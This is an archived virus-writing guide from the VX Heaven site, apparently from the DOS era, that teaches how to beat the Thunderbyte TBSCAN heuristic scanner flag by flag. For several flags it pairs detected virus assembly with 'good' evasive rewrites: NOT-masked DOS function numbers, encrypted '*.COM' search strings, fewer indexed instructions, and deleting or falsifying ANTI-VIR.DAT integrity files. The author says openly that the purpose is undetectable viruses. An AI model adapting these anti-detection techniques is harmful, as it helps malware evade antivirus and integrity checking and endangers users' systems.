Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

A guide to Anti-Heuristics / Shmistics Technology

Kohntark

[Back to index] [Comments]

INTRO

Dear Reader:

If you have been following the Virus / Anti-virus scene you might have stumbled upon the word "Heuristics." Heuristics is a term commonly used in artificial intelligence programs (Expert Systems etc.).

So what does artificial intelligence have to do with software that is not even able to catch a Vienna.Grandma.Variant.#100 virus (CARO Name?) created by a 15 year old in his spare time?

Well, it seems that the AV marketing strategists are running out of new technologies to sell to the ever hi-new-vapor-tech hungry public and have decided to add artificial intelligence to the latest Antiviral software bag of tricks.

But how intelligent these "heuristics" programs really are? Is it just another vain marketing trick or is the sunrise of artificial intelligence upon us? Can we really have intelligent programs created by fools and demented megalomaniacs?

I claim that heuristics AV programs are not intelligent at all and I will prove.

First, please enter Thunderbyte Anti-Virus (TBAV), the dutch software shareware package that has become an underground favourite due to its liberal use of the word "heuristics" and to above average good quality.

TBSCAN, TBAV's scanner is an incredibly fast program that usually identifies a high percentage of new and unknown viruses. TBSCAN is the most reliable scanner to discover the not-yet-named ditties created all around the world.

Until Now.

Enter Kohntark's "Heuristics / Shmistics guide." This informative program will show you how TBSCAN really works, how to ridicule this program, and to beat it flag by flag (you can think of flags as Heuristics warnings.)

Now you can be the first one in your block to write anti-heuristics / Shmistics viruses!

The process is incredibly simple: For each Flag or heuristic warning I have listed a BAD CODE (Example of evil, ugly code that causes heuristics flags to go off.) and GOOD CODE (Example of Good, Anti-Heuristics code.)

All you have to do when you have a virus that raises specific flags in TBSCAN is:

  1. Look up the specific Flag in the Heuristics / Shmistics guide
  2. Look at the DON'T code (which corresponds more or less to your code)
  3. Study the solution in the DO part.
  4. Adapt the solution to your particular code.

And voila!, viruses free of shmistics!

With this program I have included 2 BIG examples:

A GOOD example, the first virus this side of the galaxy not to raise ANY heuristics flags when scanned by TBSCAN.

An EVIL example: a donothing file that, as you might have guessed does not do anything, and raises more heuristics flags than any virus known to mankind.

I hope this information is enough to span the next generation of anti-heuristic / shmistic viruses, to inspire virus programmers worldwide to write and modify the trillions of viruses used as currency by some people, and to force the AV marketing strategists to come up with better ideas next time.

(Shall I mention that Thunderbyte will have to rewrite its scanner?)

				enjoy!
				Kohntark

TBAV Terminology

  1. Looking
  2. Checking
  3. Tracing
  4. Scanning
  5. Skipping
  6. Go to TBAV Flags

"Looking" means that TbScan has successfully located the entry point of the program in one step. The program code has been identified so TbScan knows where to search without the need of additional analysis.

Looking will be used on most files produced by known software.

"Checking" means that TbScan has successfully located the entry point of the program, and is scanning a frame of about 4Kb around the entry point. If the file is infected the signature of the virus will be in this area. "Checking" is a very fast and reliable scan algorithm.

Checking will be used on most files that are not produced by known software.

"Tracing" means that TbScan has successfully traced a chain of jumps or calls while locating the entry-point of the program, and is scanning a frame of about 4Kb around this location. If the file has been infected, the signature of the virus will be in this area. "Tracing" is a fast and reliable scan algorithm.

Tracing will be primarily used for TSR-type COM files or Turbo Pascal-compiled programs. Most viruses will force TbScan to use "Tracing".

"Scanning" means that TbScan is scanning the entire file (except for the exe-header which cannot contain any viral code). This algorithm will be used if "Looking", "Checking" or "Tracing" cannot be safely used. This is the case when the entry-point of the program contains other jumps and calls to code located outside the scanning frame, or when the heuristic analyzer found something that should be investigated more thoroughly. "Scanning" is a slow algorithm. Because it processes almost the entire file, including data areas, false alarms are more likely to occur.

The "Scanning" algorithm will be used while scanning bootsectors, SYS and BIN files.

"Skipping" will occur with SYS and OVL files only. It simply means that the file will not be scanned. As there are many SYS files that contain no code at all (like CONFIG.SYS) it makes absolutely no sense to scan these files for viruses. The same applies to .OV? files. Many overlay files do not deserve to be called as such as they lack an exe-header. Such files cannot be invoked through DOS making them just as invulnerable to direct virus attacks as .TXT files are. If a virus is reported to have infected an .OV? file, it involved one of the relatively few overlay files that does contain an exe-header. The infection was then the result of the virus monitoring the DOS exec-call (function 4Bh) and infecting any program being invoked that way, including "real" overlay files.

TBAV Flags
#Decryptor code found
!Invalid program.
180186+ instructions.
@Strange instructions
?Inconsistent header.
cNo integrity check
hHidden or System file.
iInternal overlay.
pPacked or compressed file.
wWindows or OS/2 header.
ASuspicious Memory Allocation
BBack to entry.
CFile has been changed
DDirect disk access
EFlexible Entry-point
FSuspicious file access
GGarbage instructions.
JSuspicious jump construct.
KUnusual stack.
LProgram load trap
MMemory resident code.
NWrong name extension.
Ocode Overwrite.
RSuspicious relocator
SSearch for executables
TInvalid timestamp.
UUndocumented system call.
VValidated program
YInvalid boot sector.
ZEXE/COM determinator.

# - Decryptor code found.

The file possibly contains a self-decryption routine. Some copy-protected software is encrypted so this warning may appear for some of your files. But if this warning appears in combination with, for example, the "T" (invalid time stamp) warning, there could be a virus involved and TbScan assumes the file is contaminated! Many viruses encrypt themselves and cause this warning to be displayed.

BAD_CODE

TBSCAN will trace right thru the most complicated encryption routines.. for polymorphic viruses this flag will be set most of the times.. including MTE and most TPE.. The more complex the routines are the more chances your virus has of setting other flags such as the G (Garbage code) flag.

GOOD_CODE

The trick here is to use dumb encryption routines, the kind the virus-guide writers hate.. why? because they are common in commercial and shareware software programs and they are non-suspicious looking. The main drawback with "Heuristics" Scanning is the possible number of false positives, and using commonly used encryption routines makes things worse.

This is why self appointed AV "researchers" had a hard time coming up with reliable detection methods for Trident's Polymorphic Engine, since it generates a lot of commonly found decryptors/encryptors. Also I must note that there is a couple of extremely esoteric encryption routines that will not be recognized by TBSCAN as encryptions at all!

! - Invalid program.

Invalid opcode (non-8088 instructions) or out-of-range branch. The program has either an entry point that located outside the body of the file, or reveals a chain of jumps that can be traced to a location outside the program file. Another possibility is that the program contains invalid processor instructions. The program being checked is probably damaged and cannot execute in most cases. At any rate, TbScan avoids risk and uses the scan method to scan the file.

1 - 80186+ instructions.

The file contains instructions which cannot be executed by 8088 processors, and require an 80186 or better processor.

@ - Strange instructions

The file contains instructions which are not likely to be generated by an assembler, but by some code generator like a polymorphic virus instead.

? - Inconsistent header.

The program being processed has an EXE-header that does not reflect the actual program lay-out. Many viruses do not update the EXE-header of an EXE file correctly after they infect the file, so if this warning pops up frequently, it appears you have a problem.

h - Hidden or System file.

The file has the Hidden or the System file attribute set. This means that the file is not visible in a DOS directory display but TbScan scans it anyway. If you don t know the origin and/or purpose of this file, you might be dealing with a Trojan Horse or a joke virus program. Copy such a file onto a diskette, remove it from its program environment, and then check if the program concerned is missing the file. If a program does not miss it, you not only have freed some disk space, but you might also have prevented a future disaster.

i - Internal overlay.

The program being processed has additional data or code behind the load-module as specified in the EXE-header of the file. The program might have internal overlay(s) or configuration or debug information appended behind the load-module of the EXE file.

p - Packed or compressed file.

This means that the program is packed or compressed. There are some utilities that can compress program files, such as EXEPACK and PKLITE. If the file became infected after compression, TbScan is able to detect the virus. However, if the file became infected before compression, the virus was also compressed in the process, and a virus scanner might no longer be able to recognize the virus. Fortunately, this does not happen very often, but you should still beware! A new program might look clean, but can turn out to be the carrier of a compressed virus. Other files in your system will become infected too, and it is these infections that will be clearly visible to virus scanners.

w - Windows or OS/2 header.

The program can be or is intended to run in a Windows (or OS/2) environment. TbScan offers a specialized scanning method for these files.

C - File has been changed

This warning appears only if you use TbSetup to generate the ANTI-VIR.DAT files and means the file has been changed. Upgrading the software would trigger this message. Otherwise, it is very likely that a virus infected the file!

NOTE: TbScan does not display this warning if only some internal configuration area of the file changes. This warning means that code at the program entry point, the entry-point itself, and/or the file size has been changed.

GOOD_CODE

The only way to avoid this is to delete or modify the Anti-Vir.Dat file in each directory where you are infecting files to. The easiest method is to delete the file, to overwrite or truncate it, so it cannot be undeleted by a "smart" user. For perfect "stealth" one could modify the contents of the file, putting the right flag in the file-to-be-infected field describing it as a "self-modifying" file. This is more involved and requires unnecessary code, since the deleting of checksum files can be implemented as a universal attack against several integrity checking programs, not just TBSCAN.

c - No integrity check.

This warning indicates that no checksum/recovery information has been found about the indicated file. It is highly recommended to use TbSetup in this case to store information of the mentioned file. This info can later be used for integrity checking and to recover from virus infections.

GOOD_CODE

This is not really a flag... it won't raise any warnings by itself.. This only means that the file ANTI-VIR.DAT wasn't found in the current directory you are scanning.. this is good news of course, as TBSCAN cannot verify any checksum information for the files...

F - Suspicious file access.

TbScan has found instruction sequences common to infection schemes used by viruses. This flag will appear with those programs that are able to create or modify existing files.

BAD_CODE

;Restore date and time of file to be infected

mov ax,5701h
mov dx,WORD PTR [si + OFFSET F_DATE - OFFSET VIRUS]
mov cx,WORD PTR [si + OFFSET F_TIME - OFFSET VIRUS]
int 21h

;Restore file attributes

lea dx,[si + FNAME - OFFSET VIRUS] ;get filename
mov cx,[si + ATTR - OFFSET VIRUS] ;get old attributes
mov ax,4301h ;set file attributes to cx
int 21h

GOOD_CODE

;Restore date and time of file to be infected

mov ax,0A8FEh
mov dx,WORD PTR [si + F_DATE - OFFSET VIRUS]
mov cx,WORD PTR [si + F_TIME - OFFSET VIRUS]
not ax ;A8FE becomes 5701
int 21h

;Restore file attributes

lea dx,[si + OFFSET FNAME - OFFSET VIRUS] ;get filename
mov cx,[si + OFFSET ATTR - OFFSET VIRUS] ;get old attributes
mov ax,0BCFEh
not ax ;BCFE becomes 4301h
int 21h

There is a million different ways of doing this, this is just an example

R - Suspicious relocator.

Flag "R" refers to a suspicious relocator. A relocator is a sequence of instructions that changes the proportion of CS:IP. It is often used by viruses, especially COM type infectors. Tests on a large collection of viruses show that TbScan issues this flag for about 65% of all viruses. Those viruses have to relocate the CS:IP proportion because they have been compiled for a specific location in the executable file; a virus that infects another program can hardly ever use its original location in the file as it is appended to this file. Sound programs "know" their location in the executable file, so they don't have to relocate themselves. On systems that operate normally only a small percentage of the programs should therefore cause this flag to be displayed.

BAD_CODE

;*****************
; 1-OPEN FILE
;*****************

lea dx,[si + OFFSET FNAME - OFFSET VIRUS]	;open the file
mov ax,3D02h					;r/w access to it
int 21h
jc NO_GOOD					;error.. quit
xchg ax,bx					;bx = file handle

Where do you think the problem is? Well, you might have read in clumsy virus writing guides of the joys of using indexed instructions to access the virus' data locations in memory to make your code fast and small. The "experts" use them even in their soup and it makes their code tight. Well, do you want tight code that can be recognized as a virus from miles away or you want real, undetectable viruses? If you chose the later do yourself a favour.. minimize the use of indexes. TBSCAN will set the R flag with just a few of them anywhere in your code.

GOOD_CODE

mov bp,si					;flabby, fat code
add bp,OFFSET FNAME - OFFSET VIRUS		;but it unsuspicious!
mov dx,bp

mov ax,3D02h					;r/w access to it
int 21h
jc NO_GOOD					;error.. quit
xchg ax,bx					;bx = file handle

You can apply the same solution for any code that can be indexed:

mov WORD PTR [si + ATTR - VIRUS],cx		;save attributes
cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h	;check for " "
add WORD PTR [si + LOC - VIRUS],cx
sub WORD PTR [si + LOC1 - VIRUS],dx
etc..

The strategy is the same.. it might add a lot of "fat" to your code, but a fat virus is better than a dead one.

N - Wrong name extension.

Name conflict. The program carries the extension .EXE but appears to be an ordinary .COM file, or it has the extension .COM but the internal layout of an .EXE file. TbScan does not take any risk in this situation, but scans the file for both EXE and COM type signatures. A wrong name extension might in some cases indicate a virus, but in most cases it doesn't.

BAD_CODE

This will occur in extremely buggy viruses that cannot distinguish EXE files from COMs or in stupid overwriting viruses. There is also a couple of DOS 5.0 files, specifically DISK.COM that have a EXE header, so special care must be taken in not raising extra flags since any possible host may have heuristic flags of its own, so any heuristic flags added by the virus will just make the file more suspicious.

S - Search for executables.

The program searches for *.COM or *.EXE files. This by itself does not indicate a virus, but it is an ingredient of most viruses anyway (they have to search for suitable files to spread themselves). If accompanied by other flags, TbScan will assume the file is infected by a virus.

BAD_CODE

The following code (even by itself!) is enough to set this flag:

	db '*.COM'
	db '*.EXE'

GOOD_CODE

To get around this use what I call "point-encryption routine" to make the strings into something not recognizable.. (Also, see the Z flag)

mov bp,OFFSET COM_FILES				;decrypt *.COM string
call POINT_ENCRYPT
add bp,02
call POINT_ENCRYPT

lea dx,[si + OFFSET COM_FILES - OFFSET VIRUS ]	;dont use this..
;see R flag
mov ax,04E00h					;mov ah,4eh, => DOS search 1st file function
mov cx,3fh					;search for any file, with any attributes
int 21H
etc..

POINT_ENCRYPT

push bp						;save bp to do dword encryptions
etc.

add bp,si
sub bp,OFFSET VIRUS				;the entry point of the virus is on si
xor WORD PTR [bp],ID2
pop bp						;restore bp
ret						;return to caller

COM_FILES
db 5Dh,59h,34h,38h,'M',0			;encrypted *.COM,0

ID2 equ 7777h					;(used in POINT_ENCRYPT)

This is just one (and rather inefficient) way of doing this... there are a million other ways... this is just to give you an idea. For a more efficient way look in the example virus.

A - Suspicious Memory Allocation

The program uses a non-standard way to search for, and/or to allocate memory. Many viruses try to hide themselves in memory, so they use a non-standard way to allocate this memory. Some programs (such as high-loaders or diagnostic software) also use non-standard ways to search or allocate memory.

B - Back to entry.

The program seems to execute some code, and after that jumps back to the entry-point of the program. Normally this results in an endless loop, except when the program also modifies some of its instructions. This is quite common behavior for computer viruses. In combination with any other flag, TbScan reports a virus.

D - Direct disk access

This flag appears if the program being processed has instructions near the entry-point to write to a disk directly. It is quite normal that some disk related utilities trigger this flag. If several files that should not be writing directly to the disk trigger this flag, your system might be infected by an unknown virus.

NOTE: A program that accesses the disk directly does not always have the "D" flag. Only when the direct disk instructions are near the program entry point does TbScan report it. If a virus is at fault, the harmful instructions are always near the entry point, so it is only there that TbScan looks for them.

E - Flexible Entry-point

This flag indicates that the program starts with a routine that determines its location within the program file. This is rather suspicious because sound programs have a fixed entry-point so they do not have to determine this location. For viruses, however, this is quite common. Approximately 50% of the known viruses trigger this flag.

G - Garbage instructions.

The program contains code that seems to have no purpose other than encryption or avoiding recognition by virus scanners. In most cases there won't be any other flag since the file is encrypted and the instructions are hidden.

NOTE: This flag appears occasionally on "normal" files. This simply indicates, however, that these are poorly designed, not infected..

J - Suspicious jump construct.

The program did not start at the program entry point. The code has either jumped at least twice before reaching the final startup code, or the program jumped using an indirect operand. Sound programs should not display this kind of strange behavior. If several files trigger this flag, you should investigate your system thoroughly.

K - Unusual stack.

The EXE file being processed has an odd (instead of even) stack offset or a suspicious stack segment. Many viruses are quite buggy by setting up an illegal stack value.

L - Program load trap

The program might trap the execution of other software. If the file also triggers the "M" flag (memory resident code), it is very likely that the file is a resident program that determines when another program executes. Many viruses trap the program load and use it to infect the program. Some anti-virus utilities also trap the program load.

M - Memory resident code.

TbScan has found instruction sequences that could cause the program to hook into important interrupts. Many TSR (Terminate and Stay Resident) programs trigger this flag because hooking into interrupts is part of their usual behavior. If several non-TSR programs trigger this warning flag, however, you should be suspicious. It is likely that a virus that remains resident in memory infected your files.

NOTE: This warning does not appear with all true TSR programs, nor can you always rely upon TSR detection in non-TSR programs.

O - code Overwrite.

This flag appears if TbScan detects that the program overwrites some of its instructions. However, it does not seem to have a complete (de)cryptor routine.

T - Invalid timestamp.

The timestamp of the program is invalid; that is, the number of seconds in the time stamp is illegal, or the date is illegal or later than the year 2000. This is suspicious because many viruses set the time stamp to an illegal value (such as 62 seconds) to mark that they already infected the file so they won't infect a file a second time. It is possible that the program being checked is contaminated with a virus that is still unknown, especially if several files on your system have an invalid time stamp. If only very few programs have an invalid time stamp, you d better correct it and scan frequently to check that the time stamp of the files remains valid.

U - Undocumented system call.

The program uses unknown DOS calls or interrupts. These unknown calls can be issued to invoke undocumented DOS features, or to communicate with an unknown driver in memory. Since many viruses use undocumented DOS features, or communicate with memory resident parts of a previously loaded instance of the virus, a program is suspicious if it performs unknown or undocumented communications. This does not necessarily indicate a virus, however, since some tricky programs also use undocumented features.

V - Validated program

The program has been validated to avoid false alarms. The design of this program would normally cause a false alarm by the heuristic scan mode of TbScan, or this program might change frequently, and TbScan excludes the file from integrity checking. Either TbSetup (automatically) or by TbScan (manually) stores these exclusions in the ANTI-VIR.DAT.

Y - Invalid boot sector.

The boot sector is not completely according to the IBM defined boot sector format. It is possible that the boot sector contains a virus or has been corrupted.

Z - EXE/COM determinator.

The program seems to check whether a file is a COM or EXE type program. Infecting a COM file is a process that is not similar to infecting an EXE file, which implies that viruses able to infect both program types should also be able to distinguish between them. There are, of course, innocent programs that need to find out whether a file is a COM or EXE file. Executable file compressors, EXE2COM, converters, debuggers, and high-loaders are examples of programs that might contain a routine to distinguish between EXE and COM files.

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua